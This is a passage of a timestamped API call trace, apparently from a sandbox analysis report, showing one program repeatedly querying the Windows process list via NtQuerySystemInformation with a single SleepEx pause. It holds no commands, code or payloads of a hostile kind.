SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.834] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.843] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.850] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.858] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.866] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.869] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.870] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.871] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.875] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.885] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.886] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.887] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0224.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.395] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.403] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.405] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.405] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.406] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.412] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.413] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.414] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.415] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.429] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.430] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.433] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.433] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.435] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.441] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.441] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.444] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.445] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.446] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.467] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.468] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.470] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.472] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xed70) returned 0x0 [0224.473] NtQuerySystemInformation (in: 